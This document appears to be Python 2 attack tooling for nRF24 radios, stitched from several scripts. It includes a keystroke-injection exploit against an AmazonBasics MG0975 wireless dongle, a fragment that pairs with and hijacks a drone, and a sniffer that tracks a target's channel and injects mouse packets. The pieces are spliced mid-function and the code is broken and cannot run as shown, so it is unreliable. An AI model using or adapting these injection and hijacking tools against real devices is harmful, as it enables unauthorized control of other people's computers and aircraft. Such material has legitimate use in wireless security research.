#!/usr/bin/env python2
'''
Author: xswxm
Blog: xswxm.com
Send payloads 1,2,3,4,5,6,7,8,9,0 to Amazonbasics MG0975 dongle continuously
e.g.: sudo python exp_attacker.py -l -a 61:8E:9C:CD:03 -f 74 -n 200
'''
import logging, time
from lib import common
common.init_args('./exp_attacker.py')
common.parser.add_argument('-a', '--address', type=str, help='Address to sniff, following as it changes channels', required=True)
common.parser.add_argument('-f', '--channel', type=int, help='RF channel', default=0)
common.parser.add_argument('-n', '--times', type=int, help='Replay times', default=0)
common.parse_and_init()
channel = common.args.channel
n = common.args.times
# 0x27 represents 'a' in this case
p = 0x27
# Parse the prefix address
address = common.args.address.replace(':', '').decode('hex')[::-1][:5]
# Put the radio in sniffer mode (ESB w/o auto ACKs)
common.radio.enter_sniffer_mode(address)
# Set channel
common.radio.set_channel(channel)
logging.debug('CRC Failure')
state = SEARCHING
continue
# Pairing is complete
elif rx_packet.aileron == 1:
time.sleep(0.25)
logging.debug('Paired')
state = PAIRED
break
logging.info("Done Pairing")
return vid
# Init command line args
common.init_args('./fly-fly-away.py')
common.parse_and_init()
# Put the radio in promiscuous mode (generic)
common.radio.enter_promiscuous_mode_generic('\x71\x0F\x55', common.RF_RATE_1M)
# Tune to 2402 MHz
common.radio.set_channel(2)
# Pair to a drone
vid = pair_drone()
# Fly, fly away!
fly_fly_away(vid)
def main():
global x, y, running
mouse_th = threading.Thread(target=read_mouse_file, args=())
mouse_th.start()
# # Start keyboard listener
# listener = Listener(
# on_press=on_press,
# on_release=on_release)
#
# listener.start()
# Keep alive payload 00:40:01:18:A7
# Parse command line arguments and initialize the radio
common.init_args('./nrf24-sniffer.py')
common.parser.add_argument(
'-a',
'--address',
type=str,
help='Address to sniff, following as it changes channels',
required=True)
common.parser.add_argument('-t',
'--timeout',
type=float,
help='Channel timeout, in milliseconds',
default=100)
common.parser.add_argument(
'-k',
'--ack_timeout',
type=int,
help='ACK timeout in microseconds, accepts [250,4000], step 250',
default=250)
common.parser.add_argument('-r',
'--retries',
type=int,
help='Auto retry limit, accepts [0,15]',
default=1,
choices=xrange(0, 16),
metavar='RETRIES')
common.parser.add_argument('-p',
'--ping_payload',
type=str,
help='Ping payload, ex 0F:0F:0F:0F',
default='00:40:01:18:A7',
metavar='PING_PAYLOAD')
common.parse_and_init()
# Parse the address
address = common.args.address.replace(':', '').decode('hex')[::-1][:5]
address_string = ':'.join('{:02X}'.format(ord(b)) for b in address[::-1])
if len(address) < 2:
raise Exception('Invalid address: {0}'.format(common.args.address))
# Put the radio in sniffer mode (ESB w/o auto ACKs)
common.radio.enter_sniffer_mode(address)
# Convert channel timeout from milliseconds to seconds
timeout = float(common.args.timeout) / float(1000)
print('Payload')
print(common.args.ping_payload)
# Parse the ping payload
ping_payload = common.args.ping_payload.replace(':', '').decode('hex')
# Format the ACK timeout and auto retry values
ack_timeout = int(common.args.ack_timeout / 250) - 1
ack_timeout = max(0, min(ack_timeout, 15))
retries = max(0, min(common.args.retries, 15))
# Sweep through the channels and decode ESB packets in pseudo-promiscuous mode
last_ping = time.time()
channel_index = 0
while running:
# Follow the target device if it changes channels
if time.time() - last_ping > timeout:
# First try pinging on the active channel
if not common.radio.transmit_payload(ping_payload, ack_timeout,
retries):
# Ping failed on the active channel, so sweep through all available channels
success = False
for channel_index in range(len(common.channels)):
common.radio.set_channel(common.channels[channel_index])
if common.radio.transmit_payload(ping_payload, ack_timeout,
retries):
# Ping successful, exit out of the ping sweep
last_ping = time.time()
logging.debug('Ping success on channel {0}'.format(
common.channels[channel_index]))
success = True
break
# Ping sweep failed
if not success:
logging.debug('Unable to ping {0}'.format(address_string))
# Ping succeeded on the active channel
else:
logging.debug('Ping success on channel {0}'.format(
common.channels[channel_index]))
last_ping = time.time()
# Try to send mouse packets if arrow keys has been pressed
#if x != 0 or y != 0:
if not q.empty():
val = struct.unpack('3b', q.get())
x = val[1]
y = val[2]
mouse_payload = build_payload(0, x, y, 0, 0)
print(mouse_payload)
common.radio.transmit_payload(mouse_payload.decode('hex'),
ack_timeout, retries)
# Receive payloads
value = common.radio.receive_payload()
if value[0] == 0:
# Reset the channel timer
last_ping = time.time()
# Split the payload from the status byte
payload = value[1:]
# Log the packet
logging.info('{0: >2} {1: >2} {2} {3}'.format(
common.channels[channel_index], len(payload), address_string,
':'.join('{:02X}'.format(b) for b in payload)))
# End of main loop
listener.stop()
